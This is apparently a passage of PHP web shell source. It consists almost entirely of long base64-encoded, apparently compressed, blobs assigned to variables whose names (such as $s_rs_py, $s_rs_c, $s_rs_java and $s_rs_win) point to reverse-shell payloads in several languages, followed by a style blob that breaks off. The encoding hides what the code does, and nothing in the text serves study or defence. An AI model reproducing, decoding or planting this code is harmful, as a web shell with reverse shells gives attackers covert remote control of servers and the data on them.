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";
$s_rs_pl = "lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A";
$s_rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
$s_rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
$s_rs_js = "nVHLasMwEDwrkH8wvliGVIImUEjIqZ/QY/rAkTeWqCy5kpwUQv69kuykebSl2Afh3Zmd3Z2lNOHONXZOKdMlkErrSgJhuqYNXU8fZu93loOUdDzaFiaxTbFTyTIx8NEKAzhjXMjyrTGagbVZTiJh0ZEVuHOqD7O8h6wzUNTnaJc5EZhWVku4aNWlIqVXCZN5SkbXQlHLM4+IDe6nIY0s3EabmtSFYxzT151niTz/rmN1SeATQl3SSRam2nrkKBHCTjT8EQmqcny5nOb78QgFPvdkvxhhfnoHT2C2YPCmVcwJrbCNPGTJzggHOI2G9u3nYUcFzEH5rNKwVNJ/3WpeOJqJI/0ct5xYVwpFDNi2BpxfQ7p1xHdPy8IV6eQ4TYJDnO+P08RocbhVBmMGlv9Vdhz6php1LydSWAcqOr26fwnJw3gE0kJy7f/s5L+98P+xczRY36tM4kVX0yj330Og3y6AfrAeDfQcDTQbDXP58AU=";
$s_rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
$s_rs_java = "lVRNb9swDD2nQP+DkJM9ZHaTDdjWIsOwYYcBA1osvXXBoMiMrdWWBIn5Qpr/PkqWXXftpQfbEvlEPj5SznNWIRp3medCF5CVWpc1ZEI3uclX7z68v3/rKqjr/PxMNkZbZH/5lmdSZ2+unpoUYLCdn5nNqpaCiZo7x0KMP9Ydz89GxsotR2AOORJgLRWvI8wggz2CKhy7rSzwwuP7Az+U2eACyd4w6a6GrusNPvr0BgMDcrccDCZPz06eHUiPWEmXSTenyGFJxrmPdGpDfbnegrWygEHcrZYFsxuVpIHnCO2hXYxWB4S7JVuxOVOwY2H7cfpptrxq/VIhE+SkPL7MZJVGx66SNSTi8/wiZTHWiFhkOysRktXkYiI6aLCv642rkt70YsxT+LRvwVFUyfe9AINSKwbpETJSUZEWXNzfWi6AwgWwf7XVx3pjx0LZDZcqIf2kKqlQbkvXiuAr8+MQcrd+JpqCeI3zlVS5q8bBJdfJ4uAQmqwEvLHagMVDMtYuU7yBcZqh/ql3YL9xR4QyqQrYX6+T8U6qcerlOcao9Bm3fGO2nbeGgWNhaNklE1opEAjFb9VmH/Rn5wl8pb2LMi60uAdkVexdu42+vsNE39ec1aBKrObzaRyBUbgKc5pVhBJsZrh1QJuAvrtYdj1ZgKV5iqlcl2pgTHygDu25uIwL37Wu2W0/oXbA/iczey2ZVjhpCBtc0+Ug8UAEaSZswOv0shTs4YG9zGd4C0vpy668+gNzP8pPLmipe+zQ3oPJ392QzkQjJcD/Uujgr41C2YA/Hpc0UbAHkdDwpPFfQWrR5E5jwaSzeUZt4ol0CTx69ogu/V/FPGfYw6cZXR/r22dm/fJRxvB6xe2k5/QP";
$s_rs_win = "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";
$s_rs_php = "7VVNb+M2ED3bgP+DlhUQCVUsyy6wQFxmL+2xwKIt0MMmFWSKsghLIsuhai+a/PcORcnWOk6yaLe9tDBikzOcx/l4fPn2nSrVbPqVVxqj4CaOmcz5fCvltuJzJutYxZvV229211DyqopnU6611KnmSmojmm2wCNezKXCTGlHztBK1MM4mN6moVSWYMGlRtVAG1jqb+ibTW26oD6kGt14frUD5QVWYQkA8EvVGG+czoMlq9dYu9xlt2qqyS35aQkkJBmNa3s/f//gDPRiu6/X7nxJ6dee//+W726t170bbOt6IJobSuxbEBteUdGV6XZnejcdk03BmeH7XkC5tUQRMto0JhkxDSpPwj9l04ivqH+uY+JgG6RYGMUWT280j9q0CfgljeYYBHxb3Pc7RktwfATO26wG7lIq2YUbIJuUHAQaCK8UaU6WF1LursEcWOT1ZuyFMMLKz0+skxEgTJGOzMy0Gk5IgDimOGEQehGcxQyKYXF+uuxUoGM2zOgXJdsgO4Pp3rgNimEKSLebd54bMfRX5SKlGdj8Y0906xPa0ki22DKKVS8lnZ9gZY1zZE0PG6Dayknu8ENoN7gIkedo2Wc2DMFpEqxDLIHvRuGQnxV4LwwOfRX49x46zPRY6J7ekA5zsS1GhV72htMhwjC7Izqyw48E4d65rlubbtM4MKwMSs/zOCz78egf3X4exQD5jsVqHffzEz3OK+368Ll5AmgsdoCsMWTkse78v6Tg7Z33svnt6GS3qcfm+6kq18yLew4P3jP+3Fv2ht8Gu7tZHPA/v4wdbOV6H72D+9PJR56TLskunYJUEfmzMsHUDsics/JPWu8N+DjTTOvsYLOitWxAlFCcR0SSMknPjHo3LC8YeTWmqtGSpVLzBDMoI8XEQQjk/9uwN9lxzkK1mtlacz+hJjKm4qZBvVvNsOD7TaPHKkeT1I8uXj7DB6zhodDuwzz5+Lgvb44cHt3JXhuFojL7O+mbaDvc59Rf3rDreW6HeBRgQocDia8wiq6wnZosmPSHp7MRiQQtEyDs7g4Grw2D7VvkiHNP1E7whrYugg/MpMnsVdPkS6PKzQB/P+Dti9rB0FX66T872Q7c7Kg52PTyH078HJ6NW5AcZLazIOfKWnYDwBv+OYvg31A7+otrBf17t4LLavSBv8L+8XToCr8sbfKa8wReTN3hGNODflTf4J+TtHPQ5efsimvbu9k8=";
$s_favicon = "";
$s_arrow = "";
$s_dark_cb = "";
$s_bright_cb = "";
$s_style = "rVbLjpswFP0VqqhSH4AgSTMzoH5Cl11VXRgwwRqwkTGdZBD/Xj/BgJNppbE3Drm+z3PP9ZehJJgFJWhQfU1+Zj1mvfeDYOJ3kKIyHTNSXIcM5M9nSnpcJLtIrlRe69ArTOJ9e0lzUhOa7Eq51J8vEJ0rlhy58FjRISO0gDSJ24vXkRoV3m4vVzqCwdw+y0PK4IUFBcwJBQwRnGCCIRdLKvIH0mFpamwpHFpQFAifk8h75L6MJaHNUKCurcE1QbhG4joDWQ09VvntkPe04yoKWIK+Zum4awDCiyBjudKgIa+BcjygoEB9l8QRt+D49IIKVvFj9DE13vC8KH92FQRcfpBxgRqdcVLDkqUNoGeEk2i6EU2yHiuGe39X8TBXYC8c4PnOnhELGAW4ExlIKGGAwU9BfAgPDwU8f1bx3BO4b9IDfggvLU8/rFHHVD08sK7IroG4d6XTaPdEZo4yMxR2vATDfyR6iyMDG1HnoFKoi09CdOuCdhXINTukgGOCPprChSJ0hEui0RuIsrlMa0UnS4mIUSiWnihNLKs7j9FB+7gXKeAZZCgHtcZFg4qi5mgNz+DKs23jXZuye+tB9JYUepfq15AxHmTXglxHwLWLYjZoUc79k9jpv3StQ+WKOd7Fcwd+jhv4iC8bgM+1VoFqkrHDPZzEvu3oW37O/48hwm3PXv2wpaRpmR+yCwMUAle3aKBHJoqMMEYaG32HJ7HvU7EFR25emR22GDJ+WDSmUXp4iORV5XnWs2Flb+H